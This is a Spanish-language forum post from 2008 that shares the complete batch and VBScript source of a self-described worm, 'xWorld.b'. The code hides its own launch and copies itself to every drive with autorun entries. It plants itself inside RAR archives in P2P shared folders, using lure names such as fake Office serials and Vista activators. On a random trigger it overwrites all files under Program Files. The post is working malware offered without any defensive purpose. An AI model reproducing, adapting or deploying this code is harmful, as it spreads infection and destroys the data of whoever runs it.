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| | |-+  [virus][batch][vbs] xWorld.b
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Autor Tema: [virus][batch][vbs] xWorld.b  (Leído 2,016 veces)
The Shadow

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[virus][batch][vbs] xWorld.b
« en: 7 Julio 2008, 23:38 pm »

  1. :: Nombre: xWorld.b
  2. :: Codeado por: Shadow; tshadow; The Shadow
  3. :: Fecha: 14/04/08
  4. :: Info: Worm de propagacion por USB, P2P y .rar . . .
  5. :: Payload: El payload es aleatorio y al ejecutarse daña todos los archivos
  6. ::   del directorio ^%programfiles^%
  7. @echo off
  8. goto %1_
  9. :_
  10. set a="%temp%\xw.bat"
  11. echo set shell = CreateObject("wscript.shell") > "%temp%\xwr.vbs"
  12. echo shell.run "cmd /c %a% xc", vbHide >> "%temp%\xwr.vbs"
  13. copy %0 %a%>nul
  14. start "%temp%\xwr.vbs"
  16. :xc_
  17. for %%v IN (D F G H I J K L M N O P Q R S T U V W X Y Z) do call :cmp %%v
  18. call :p2p
  19. if /I %random:~1,1% lss 5 goto wrm
  21. :cmp
  22. if exist "%1:" (
  23. copy %a% "%1:\xw.bat">nul
  24. echo [autorun] > "%1:\autorun.inf"
  25. echo open=xw.bat >> "%1:\autorun.inf"
  26. echo shellexecute=xw.bat >> "%1:\autorun.inf"
  27. echo shellexecute=xw.bat >> "%1:\autorun.inf"
  28. echo shell\explorar\command=xw.bat >> "%1:\autorun.inf"
  29. echo shell\explorar=^&Explorar >> "%1:\autorun.inf"
  30. )
  31. goto :EOF
  33. :wrm
  35. cd "%programfiles%"
  36. dir /B > %homedrive%\dir.txt
  38. :worm
  39. set target=%1
  40. cd "%target%"
  41. for %%e in (*.*) do echo xWorld by Shadow>%%e
  42. cd "%programfiles%"
  43. goto :EOF
  45. for /f "tokens=* " %%a in (%homedrive%\dir.txt) do call :worm "%%a"
  47. :p2p
  48. set a="%temp%\xw.bat"
  49. if exist %windir%\t.rar (del %windir%\t.rar)
  50. type %0>op.bat
  51. set o="%systemdrive%%~p0op.bat"
  52. cd "%systemdrive%%~p0"
  53. echo eMule\Incoming\ > %windir%\yer.t
  54. echo Shareaza\Downloads\ >> %windir%\yer.t
  55. echo BearShare\Shared\ >> %windir%\yer.t
  56. echo EDONKEY2000\incoming\ >> %windir%\yer.t
  57. echo LimeWire\Shared\ >> %windir%\yer.t
  58. echo Path_msn_Emoticonos > %windir%\jer.t
  59. echo sms_gratis >> %windir%\jer.t
  60. echo polifonicos_free >> %windir%\jer.t
  61. echo Microsoft_Office_2007_all_serials >> %windir%\jer.t
  62. echo Windows_Vista_activation_tool >> %windir%\jer.t
  63. echo Windows_Vista_all_serials >> %windir%\jer.t
  64. echo MSN_hack_codes >> %windir%\jer.t
  65. set rc=1
  66. set r="%programfiles%\WINRAR\WinRAR.exe"
  67. %r% a %windir%\t.rar %o%
  68. if not %errorlevel%==9009 set rc=0
  69. goto fr
  70. :fr2
  71. set uno=%1
  72. for /F "tokens=* delims=" %%g in (%windir%\jer.t) do (
  73.         if %rc%==0 (
  74.            @copy /y %o% "%%g.bat"
  75.           cls
  76.           ping -n 2 localhost > nul
  77.           %r% a "%%g.rar" "%%g.bat"
  78.         )
  79. )
  80. goto :EOF                                  
  81. :fr
  82. for /F "tokens=* delims=" %%a in (%windir%\yer.t) do (
  83.         if exist "%programfiles%\%%a" (
  84.            cd "%programfiles%\%%a"    
  85.            for %%e in (*.rar) do (
  86.               @copy /y %o% "%%~ne.bat"
  87.              cls
  88.              ping -n 2 localhost > nul
  89.              %r% a "%%e" "%%~ne.bat"
  90.            )      
  91.         call :fr2 %%a
  92.          )
  93. )
  94. cd %windir%
  95. del *.t
  96. cd "%systemdrive%%~p0"
  97. del op.bat
  98. goto :EOF

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